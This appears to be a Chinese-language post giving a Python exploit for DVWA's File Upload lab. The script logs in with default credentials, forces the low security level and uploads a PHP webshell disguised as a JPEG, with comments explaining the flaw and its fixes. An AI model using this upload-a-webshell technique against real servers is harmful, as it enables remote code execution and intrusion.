dvwa上传漏洞利用exp

用法(python3)

针对单个ip
d盘放个小马(D:\cmd.php)

url案例
http://xx.xx.xx.xx:9090

exp

import requests
import re

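# Flow: log in to a DVWA lab instance with its default account, pin the
# session to the "low" security level, then submit one file to the File Upload
# exercise and print the path the server reports back.
#
# Why it works against DVWA "low": that level is understood to perform no
# server-side validation of the uploaded file (extension, content or MIME
# type), and the upload directory is served by the PHP handler. The
# corresponding hardening is an extension allow-list, server-generated file
# names, storage outside the web root (or with script execution disabled) and
# never trusting the client-supplied Content-Type.

# Base URL of the lab instance; surrounding whitespace and a trailing slash
# are dropped so the path joins below do not produce "//login.php".
url = input("请输入[http://127.0.0.1:8080]:"+'\n').strip().rstrip('/')
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    # The header name was misspelled 'Accept-Lanuage', which no server honours.
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
}

# Fetch the login form first: it carries the anti-CSRF token and sets the
# session cookie that the later requests reuse.
index_url = url + '/login.php'
index_response = requests.get(url=index_url, headers=headers, timeout=5)

# Fail with a clear message instead of an IndexError when the page is not a
# DVWA login form (wrong URL, proxy error page, ...).
token_match = re.search(r"name='user_token' value='(.*?)'", index_response.text)
if token_match is None:
    raise SystemExit("未获取到user_token,请检查url")
user_token = token_match.group(1)

# DVWA's documented default lab credentials. A deployment that still accepts
# them is itself a finding, independent of the upload flaw.
post_data = {
    'username': 'admin',
    'password': 'password',
    'Login': 'Login',
    'user_token': user_token,
}

# Copy the session cookies into a plain dict and set the difficulty cookie.
# The level is chosen by a client-controlled cookie here, so it offers no
# protection on its own.
cookies = requests.utils.dict_from_cookiejar(index_response.cookies)
cookies['security'] = 'low'

# Authenticate the session, then load the upload page once before posting.
# Neither response body is inspected.
requests.post(url=index_url, headers=headers, data=post_data, timeout=5, cookies=cookies)
upload_url = url + '/vulnerabilities/upload/'
requests.get(url=upload_url, headers=headers, timeout=5, cookies=cookies)

# The context manager closes the local file handle, which the original left
# open. The multipart part declares 'image/jpeg' for a .php file name: the
# declared type is attacker-controlled metadata, which is why checks based on
# it are not a defence.
with open(r'D:\cmd.php', 'rb') as upload_file:
    files = {
        'MAX_FILE_SIZE': (None, '100000'),
        'uploaded': ('cmd.php', upload_file, 'image/jpeg'),
        'Upload': (None, 'Upload'),
        'user_token': (None, user_token),
    }
    # A timeout was missing on this request only; without one a stalled
    # server blocks the script indefinitely.
    r = requests.post(upload_url, files=files, headers=headers, cookies=cookies, timeout=5)

# Example of the success fragment in the response:
#   <pre>../../hackable/uploads/cmd.php succesfully uploaded!</pre>
# NOTE(review): the page rendering stripped the HTML tags from this comment and
# from the pattern below; <pre>...</pre> is reconstructed from DVWA's output
# format - confirm against the actual response.
if 'cmd.php' in r.text:
    res = re.findall(r'<pre>(.*?)</pre>', r.text)
    print("上传成功路径为:", res)
    print("-"*100)
else:
    # Also reached when the server rejected the file, not only on a
    # connection problem; the message text is kept as the author wrote it.
    print("连接错误")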
